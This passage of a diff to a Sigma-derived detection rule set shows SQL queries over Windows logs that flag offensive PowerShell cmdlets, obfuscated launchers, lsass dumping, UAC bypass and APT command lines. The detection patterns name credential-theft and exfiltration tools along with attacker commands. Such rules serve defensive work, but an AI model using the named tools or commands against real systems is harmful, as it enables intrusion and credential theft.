'%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", "attack.execution", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", - "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Admin activity (unclear what they do nowadays with finger.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "status": "test", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "test", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE 